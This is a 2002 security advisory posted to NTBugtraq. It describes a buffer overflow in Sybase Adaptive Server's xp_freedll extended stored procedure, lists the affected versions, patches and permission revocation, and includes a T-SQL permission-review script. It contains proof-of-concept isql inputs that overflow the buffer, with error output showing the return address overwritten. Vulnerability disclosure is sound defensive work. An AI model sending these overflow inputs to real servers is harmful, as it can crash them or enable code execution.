ASI Sybase Security Alert: Buffer overflow in xp_freedll

From: Aaron C. Newman (Application Security, Inc.) (anewman@APPSECINC.COM)
Date: 11/27/02

    Date:         Wed, 27 Nov 2002 14:09:46 -0500
    From: "Aaron C. Newman (Application Security, Inc.)" <anewman@APPSECINC.COM>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Sybase Adaptive Server buffer overflow in xp_freedll extended stored
    procedure

    http://www.appsecinc.com/resources/alerts/sybase/02-0003.html

    To determine if you should apply this hot fix, download AppDetective for
    Sybase from http://www.sybasesecurity.net/products/appdetective/sybase/.

    Risk level: High

    Threat: Allows a non-privileged login to gain full control of the server

    Versions Affected: Sybase Adaptive Server 12.0 and 12.5

    Summary:
    The extended stored procedure xp_freedll contains a buffer overflow that
    may allow an attacker to overwrite the stack and execute arbitrary code
    under the security context of the server. Execute permissions are
    granted to public in the sybsystemprocs database on this extended stored
    procedure.

    Details:
    Sybase Adaptive Server provides an extended stored procedure (ESP)
    called xp_freedll in the database sybsystemprocs. This ESP is used to
    release a DLL that has been loaded by another extended stored procedure.

    xp_freedll accepts a single parameter, the name of the DLL to free.
    xp_freedll does not validate the length of the string passed in this
    parameter; it copies the string into a small fixed-size memory buffer
    regardless of its length. When the string is longer than the buffer,
    the copy overwrites the stack, including the saved return address.
    Once the return address is overwritten, execution can be redirected to
    an arbitrary location in memory, and opcodes embedded in the long
    string passed to the ESP can be executed. This allows the attacker to
    run arbitrary code under the security context of the extended stored
    procedure server.

    Below is an example of overflowing the buffer using the SQL tool
    isql.exe.

    Memory corruption first occurs with a buffer of length 45.
    1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
    2> GO
    Msg 11496, Level 16, State 7:
    Procedure 'xp_freedll', Line 2:
    Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error
    log file for detailed error description. (return status = -6)

    With a buffer of 53 bytes in length, an exception is thrown.
    1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
    2> GO
    Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this
    is an user DLL check the code else contact Sybase Technical Support.
    (return status = 1)

    The following entries are recorded into the event logs.
    11403: Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp.
    If this is an user DLL check the code else contact Sybase Technical
    Support.
    11403: Encountered an exception(193) in ESP xp_freedll in DLL
    sybsyesp. If this is an user DLL check the code else contact Sybase
    Technical Support.
    11403: Encountered an exception(997) in ESP xp_freedll in DLL
    sybsyesp. If this is an user DLL check the code else contact Sybase
    Technical Support.

    At 54 bytes in length, the following memory locations appear in the
    event logs:
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_senddone()' .
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_sendinfo()' .
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x696c6c not in pool in 'srv_sendstatus' .

    At 55 bytes in length, the following memory locations appear in the
    event logs:
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x642e5858 not in pool in 'srv_senddone()' .

    Notice that the logged memory location now contains the bytes 5858:
    0x58 is the ASCII code of the character X used to fill the buffer, so
    the pointer is being overwritten with the contents of the parameter.

    As the buffer size is increased further, the address is completely
    overwritten by the buffer contents (0x58585858 is four X characters).
    11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
    address 0x58585858 not in pool in 'srv_sendstatus' .

    Fix:
    Execute permissions on the extended stored procedure xp_freedll in the
    sybsystemprocs database should be revoked from public.

    You should also apply the following patches:
    12.5.0.2 - 11/14/2002
    12.0.0.6 ESD#1 - 11/5/2002

    These patches can be downloaded from http://downloads.sybase.com/swd/swx
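    The permission check and revoke described above, written out as an
    added Transact-SQL script for isql (example code, not part of the
    advisory). It assumes a login holding sa_role and the Sybase ASE
    catalog layout: sysobjects.type = 'XP' marks an extended stored
    procedure, sysprotects.action = 224 is EXECUTE, and protecttype 0 or 1
    is a grant; sp_helprotect and revoke are standard ASE commands.

```sql
-- Added example: review and revoke public EXECUTE on xp_freedll.
-- Assumed catalog values: type 'XP' = ESP, action 224 = EXECUTE,
-- protecttype 0/1 = grant (with/without grant option), uid 0 = public.
use sybsystemprocs
go

-- 1. Show the current permissions on the ESP named in the advisory.
sp_helprotect xp_freedll
go

-- 2. List every ESP in this database that public may execute, so the
--    same review covers other extended stored procedures as well.
select o.name            as esp_name,
       u.name            as grantee,
       p.protecttype     as protect_type
from   sysobjects o, sysprotects p, sysusers u
where  o.id   = p.id
and    p.uid  = u.uid
and    o.type = 'XP'
and    p.action = 224               -- EXECUTE
and    p.protecttype in (0, 1)      -- grant / grant with grant option
and    u.name = 'public'
order  by o.name
go

-- 3. Apply the fix from the advisory.
revoke execute on xp_freedll from public
go

-- 4. Verify: public should no longer be listed for xp_freedll.
sp_helprotect xp_freedll
go
```

    Run the script from isql as a login with sa_role; step 2 is the
    part to repeat after applying the vendor patches, since a patch
    can reinstall sybsystemprocs objects with default permissions.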

    Thank you,
    support@appsecinc.com
    Application Security, Inc.
    phone: 212-490-6022
    fax: 212-490-6456
    -Protection Where It Counts-
